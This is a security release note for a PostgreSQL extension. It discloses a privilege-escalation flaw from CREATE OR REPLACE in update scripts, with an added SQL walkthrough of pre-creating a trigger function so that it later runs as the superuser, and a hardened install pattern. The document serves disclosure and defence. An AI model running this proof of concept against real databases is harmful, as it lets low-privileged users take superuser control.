This release contains bug fixes since the 1.5.0 release.
This release is high priority for upgrade. We strongly recommend that you
upgrade as soon as possible.
Bug Fixes
- PR #351 - Make serialize functions strict
- Toolkit 1.5 and earlier contain a vulnerability: a PL/pgSQL trigger function was created with CREATE OR REPLACE, and the update scripts did not lock down the search path. A user could therefore pre-create the trigger function and use it to run arbitrary code. The fix removes the trigger entirely; it no longer pulls its weight. This release also locks down our update scripts so that they use CREATE OR REPLACE only where it is actually necessary: while we don't yet have an exploit for the other functions, it would be unsurprising if one exists.
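The pre-creation problem described above, as an added SQL example that is not Toolkit's own code. The role (lowpriv), schema (toolkit_demo), table and function names are hypothetical; it assumes a superuser session plus an ordinary login role that can create objects in the public schema, and it shows the hardened form alongside the vulnerable one.

```sql
-- Added example, not from the Toolkit repository. Names are hypothetical.
-- Run as a superuser; "lowpriv" is an ordinary login role. On PostgreSQL 15+
-- the GRANT below reproduces the older default where anyone may create in public.
GRANT CREATE ON SCHEMA public TO lowpriv;

-- 1. Attacker pre-creates a function with the name and signature the
--    install script will later define, in a schema it is allowed to write to.
SET ROLE lowpriv;
CREATE FUNCTION public.toolkit_demo_trigger() RETURNS trigger
    LANGUAGE plpgsql AS $$
BEGIN
    RETURN NEW;   -- placeholder body, swapped out after installation
END $$;
RESET ROLE;

-- 2. Vulnerable install script: unqualified name, search_path left at the
--    default ("$user", public), CREATE OR REPLACE. The name resolves to the
--    attacker's function; its body is replaced, but ownership and ACLs are
--    left unchanged (documented CREATE OR REPLACE semantics).
CREATE OR REPLACE FUNCTION toolkit_demo_trigger() RETURNS trigger
    LANGUAGE plpgsql AS $$
BEGIN
    RETURN NEW;
END $$;

CREATE TABLE demo_events (id serial PRIMARY KEY, payload text);
CREATE TRIGGER demo_events_trg BEFORE INSERT ON demo_events
    FOR EACH ROW EXECUTE FUNCTION toolkit_demo_trigger();

-- 3. Check: who owns the function the trigger now calls? Expected: lowpriv.
SELECT p.proname, pg_get_userbyid(p.proowner) AS owner
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
WHERE n.nspname = 'public' AND p.proname = 'toolkit_demo_trigger';

-- 4. Still the owner, the attacker redefines the body. A PL/pgSQL trigger
--    runs with the privileges of whoever executes the triggering statement,
--    so the new body executes as the superuser on the next maintenance insert.
SET ROLE lowpriv;
CREATE OR REPLACE FUNCTION public.toolkit_demo_trigger() RETURNS trigger
    LANGUAGE plpgsql AS $$
BEGIN
    RAISE NOTICE 'trigger body now runs as %', current_user;  -- arbitrary code goes here
    RETURN NEW;
END $$;
RESET ROLE;
INSERT INTO demo_events (payload) VALUES ('routine insert');
-- NOTICE:  trigger body now runs as <superuser name>

-- 5. Hardened install pattern: plain CREATE FUNCTION (errors out if the name
--    is already taken instead of silently adopting a foreign function), a
--    schema the installer controls, and search_path pinned on the function so
--    nothing inside it resolves through caller-controlled schemas.
CREATE SCHEMA IF NOT EXISTS toolkit_demo;
CREATE FUNCTION toolkit_demo.safe_trigger() RETURNS trigger
    LANGUAGE plpgsql
    SET search_path = pg_catalog, pg_temp
    AS $$
BEGIN
    RETURN NEW;
END $$;
```

Two points are worth checking in any extension update script: ownership (step 3) after every CREATE OR REPLACE, since a superuser replacing an existing function does not take it over, and write access to the schemas that unqualified names can resolve to (REVOKE CREATE ON SCHEMA public FROM PUBLIC removes the foothold used in step 1 on older defaults).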